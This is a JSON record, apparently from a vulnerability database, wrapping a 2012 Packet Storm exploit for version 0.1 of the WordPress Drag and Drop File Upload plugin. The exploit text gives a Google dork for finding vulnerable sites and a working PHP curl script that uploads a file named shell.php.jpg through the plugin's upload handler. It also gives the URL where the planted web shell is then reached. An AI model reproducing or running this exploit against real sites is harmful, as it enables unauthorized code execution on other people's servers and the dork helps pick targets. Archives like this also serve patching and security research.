{"id": "PACKETSTORM:113503", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Drag And Drop File Upload 0.1 Shell Upload", "description": "", "published": "2012-06-12T00:00:00", "modified": "2012-06-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/113503/WordPress-Drag-And-Drop-File-Upload-0.1-Shell-Upload.html", "reporter": "Adrien Thierry", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:24:53", "viewCount": 3, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:24:53", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:24:53", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/113503/wpdragdrop-shell.txt", "sourceData": "`########################################################### \n# \n# Exploit Title: Wordpress drag and drop file upload 0.1 Arbitrary File Upload \n# Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/ \n# Date: 11/06/2012 \n# Exploit Author: Adrien Thierry \n# Vendor Homepage: http://www.ali.dj/ \n# Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip \n# Version: 0.1 \n# \n########################################################### \n \nVuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php \n \nexploit : \n \n<?php \n$u=\"shell.php.jpg\"; \n$c = curl_init(\"http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php\"); \ncurl_setopt($c, CURLOPT_POST, true); \ncurl_setopt($c, CURLOPT_POSTFIELDS, \narray('file'=>\"@$u\")); \ncurl_setopt($c, CURLOPT_RETURNTRANSFER, 1); \n$e = curl_exec($c); \ncurl_close($c); \necho $e; \n?> \n \nShell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg \n \n##################################################################### \n`\n", "immutableFields": []}

{}